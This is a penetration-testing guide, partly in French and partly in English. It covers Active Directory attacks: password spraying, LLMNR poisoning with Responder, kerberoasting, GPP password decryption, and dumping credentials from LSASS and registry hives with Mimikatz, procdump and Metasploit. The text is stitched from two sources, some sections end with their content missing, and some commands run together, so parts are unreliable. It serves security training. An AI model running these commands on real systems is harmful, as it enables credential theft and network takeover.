PENTEST ACTIVE DIRECTORY FROM SCRATCH
- Trouver des login/mdp en dehors du réseau
- Attaque par BruteForce sur les différents service accessible depuis internet :
- Email (Office365, OWA)
- Communication (Lync, XMPP, WebEx)
- Collaboration (JIRA, Slack, Teams, etc…)
- Autres Services (CMS, Support, Jenkins, etc…)
- Attaque par BruteForce sur les différents service accessible depuis internet :
Outils : Spray from Spiderlabs, Ruler
- Trouver des login/mdp dans le réseau
- Dans le réseau mais sans avoir de compte
- Responder :
Explication simplifiée : Quand un utilisateur dans le réseau fait une requête DNS qui échoue (exemple : il cherche un répertoire partagé qui n’existe plus) alors le protocole utilisé sera celui du LLMNR (Link-local Multicast Name Resolution).
Donc quand le PC victime n’arrive pas à faire DNS lookup, la victime demande à tout le monde sur le réseau s’ils savent où se trouve ce répertoire (broadcast du réseau).
On peut alors utiliser Responder pour faire croire que c’est bien nous le “hostname” qu’il recherche. On peut alors forcer la victime à s’identifier avec son NTLMv2.
Du côté de l’attaquant on peut alors récupérer non pas le NTLMv2 mais le hash NTLM challenge/response.
Il ne nous reste plus qu’à le cracker avec hashcat par exemple.
Petit tips : Si on ne veut pas ou que l’on a pas le temps de récupérer ce hash on peut utiliser Responder pour faire apparaître une pop-up d’authentification et la victime rentrera son mot de passe en claire dedans (marche dans 95% des cas).
- MultiRelay (Responder ++)
- Enumeration des utilisateurs sans avoir de creds
- Abuse Kerberos
nmap -p88 –script krb5-enum-users –script-args krb5-enum-users.realm”DomainControllerName”, userdb=”PathToUsersWordlist”, <DomainControllerIp>
- CrackMapExec (CME)
cme smb <ip> -d “DomainNameController” -u “UsersWordlist” -p “PasswordWordlist”
- Après avoir compromis votre première victime
- Enumeration
- Network Info
- netstat -anop | findstr LISTEN
- net group “Domain Admins” / domain
- Process List
- tasklist /v
- System Info
- systeminfo
- Get-WmiObject -class win32 operatingsystem | select -property * |
- Password Search
- dir /s *password*
- findstr /s /n /i /p foo *
- findstr /si pass *.txt | *xml | *ini
Python script : RTFM.py
- Privilege Escalation
- Unquoted Service Path
- Web / Windows cred
- UserSPN
On voit plusieurs répertoires différents auxquelles on va essayer de se connecter successivement en samba.
En cherchant dans le répertoire partagé NETLOGON on retrouve un fichier contenant un fichier “cpassword”. Mais qu’est ce que c’est ?
cpassword est le nom de l’attribut qui stocke les mots de passe dans l’élément Group Policy Preference (PS: c’est dans le sous dossier Préférence que l’on a trouvé ce fichier contenant le cpassword). Chaque fois qu’une préférence nécessite d’être enregistrée avec un mot de passe, le mot de passe lui-même est enregistré dans cet attribut. L’attribut n’est en fait qu’une valeur dans le XML, stocké dans le dossier SYSVOL des Domain Controllers.
Voici à quoi ressemble un cpassword :
En cherchant quelques secondes sur internet, on trouve un framework qui s’apelle gpp-decrypt (déjà présent dans Kali) permettant de décrypter le cpassword :
- root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Dans le résultat de l’analyse nmap, on a vu que le port 88 était ouvert avec le service Kerberos, d’où la nécessité d’associer certains noms de principal de service (SPN) au compte utilisateur normal. C’est pourquoi nous avons téléchargé et installé impacket de Github pour utiliser sa classe python GetUserSPN.py
https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py
On se retrouve avec un hash Kerberos :
Que l’on va stocker dans un fichier et soumettre à hashcat :
- hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt –force –show
Hop on trouve un mot de passe d’un compte admin.
Nous allons maintenant utiliser le script metasploit ou impacket (As You Want) Psexec. Psexec permet d’exécuter une commande à distance sur la victime et de retourner le résultat.
De la vous aurez la main sur la victime avec les droits administrateur. TADAM !
- Dumping Clear-Text Credentials
Passwords in clear-text that are stored in a Windows host can allow penetration testers to perform lateral movement inside an internal network and eventually fully compromise it. Therefore in a system that has been compromised with elevated access (Local Administrator or SYSTEM) and persistence has been achieved the hunt for clear-text passwords should be one of the first post exploitation activities. This is due to the fact that is the easiest and the fastest way to achieve domain administrator privileges and at the same time being less noisy.
The article contains Windows locations where passwords might exist and techniques to retrieve them.
LSA Secrets
LSA Secrets is a registry location which contains important data that are used by the Local Security Authority like authentication, logging users on to the host, local security policy etc. This information is stored in the following registry key.
1 | HKEY_LOCAL_MACHINE/Security/Policy/Secrets |
Due to the sensitivity of information Windows is protecting access to the Security folder in the registry with permissions. By default only the SYSTEM account can access the LSA Secrets registry location.
LSA Secrets – Registry Permissions
Giving the appropriate permissions to the administrator account and re-open the registry will unveil all the subfolders that are contained in the Security folder.
LSA Secrets – Registry Location
This location contains the password of the account that is logged in an encrypted format. However the key to reverse the password is stored in the parent key: Policy.
1 | HKEY_LOCAL_MACHINE/Security/Policy |
Registry keys of interest are except of Security, the SAM and the System as they contain password hashes. From an elevated command prompt the registry keys can be saved with the reg utility.
123 | reg save hklm\sam c:\temp\sam.savereg save hklm\security c:\temp\security.savereg save hklm\system c:\temp\system.save |
Dump Registry Hives
Impacket suite contains a python script that can read the contents of these registry keys and decrypt the LSA Secrets password.
impacket – Registry Hives
Alternatively there is a post exploitation module in Metasploit that can be used from an existing Meterpreter session to retrieve the password in clear-text.
1 | post/windows/gather/lsa_secrets |
Metasploit – LSA Secrets
The same output can be achieved with the lsaSecretRead binary.
1 | lsaSecretRead.exe DefaultPassword |
lsaSecretRead – Red LSA Secret Password
LSASS Process
The Local Security Authority Subsystem Service (LSASS) handles the enforcement of security policy in a Windows host. In Windows environments from 2000 to Server 2008 the memory of the LSASS process was storing passwords in clear-text to support WDigest and SSP authentication. Therefore tools such as Mimikatz could retrieve the password easily.
1 | procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 |
Procdump – lsass process
Microsoft from Windows 8.1 and Windows Server 2012 to enhance security of the systems further prevented LSASS from storing passwords in clear-text. However in a system that has been already compromised with elevated credentials a minor registry modification can instruct LSASS process to store clear-text passwords in its memory in the next login of the user.
1 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD) |
Mimikatz – Registry Setting for Windows 2012 and 2016
Metasploit Framework has a post exploitation module which can be used to enable caching of Wdigest authentication by modifying the registry automatically.
1 | post/windows/manage/wdigest_caching |
Metasploit – WDigest Caching
Mimikatz can be used offline in order to read the contents of the LSASS dump and especially sections that contain logon passwords.
1 | mimikatz.exe log « sekurlsa::minidump lsass.dmp » sekurlsa::logonPasswords exit |
Mimikatz – LSASS dump
The password of the John user was retrieved in plain-text through WDigest authentication protocol.
Mimikatz – ClearText Password in LSASS
Alternatively Mimikatz can be dropped into the target if the system doesn’t have an endpoint solution or if the binary has been modified to evade detection.
12 | privilege::debugsekurlsa::logonPasswords full |
Mimikatz – Logon Passwords Command
Metasploit Framework has an extension which can be loaded to Meterpreter in order to execute Mimikatz commands directly from memory.
Mimikatz – Kiwi Meterpeter Extension
WDigest authentication credentials can retrieved by executing the following command:
Mimikatz – wdigest credentials via Meterpreter Kiwi
Windows credential editor can also retrieve wdigest passwords in clear-text from older Windows environments. (XP to Windows 8). If the environment is Windows Server 2012, 2016, Windows 8.1 and Windows 10 the method with Mimikatz is more reliable.
1 | wce.exe -w |
Windows Credential Editor
Running also the PowerShell module of Mimikatz directly from console or executing from memory will also retrieve the password from the LSASS process.
Mimikatz – PowerSploit
Credential Manager
Windows is using Credential Manager to digitally store various other credentials in an encrypted format by using the Windows Data Protection API. Credentials that have been used by the user to access an internal system over the web or a network resource can be retrieved.
Running LaZagne on the target host can retrieved all the passwords that are stored on the system in various formats (not only plain-text).
LaZagne
However browser based passwords will be retrieved in plain-text. This could give the opportunity to the penetration tester to expand his access to various other systems.
LaZagne – Browser Based Passwords
Nikhil Mittal developed a PowerShell script which is part of the Nishang framework that can be used to retrieve passwords from the Windows Vault similar to LaZagne tool.
Nishang – Get-WebCredentials PowerShell Script
Group Policy Preferences
Windows workstations that are attached to a domain have access to the Groups.xml file on the domain controller. Often this file is cached locally on the workstation. The location of this file in the Domain Controller and in the Host itself can be seen below:
12 | \\DC.PENTESTLAB.LOCAL\SYSVOL\pentestlab.local\Policies\{xxx}\MACHINE\Preferences\Groups\Groups.xmlC:\ProgramData\Microsoft\Group Policy\History\{xxx}\Machine\Preferences\Groups\Groups.xml |
This file contains the cPassword value in an encrypted format but with a publicly known key. There are various scripts which they can decrypt the value cPassword. Metasploit Framework can also automate the task with the below post exploitation module.
1 | post/windows/gather/credentials/gpp |
Metasploit – Decrypting GPP Passwords
Full details of decrypting GPP passwords can be found in the article Group Policy Preferences.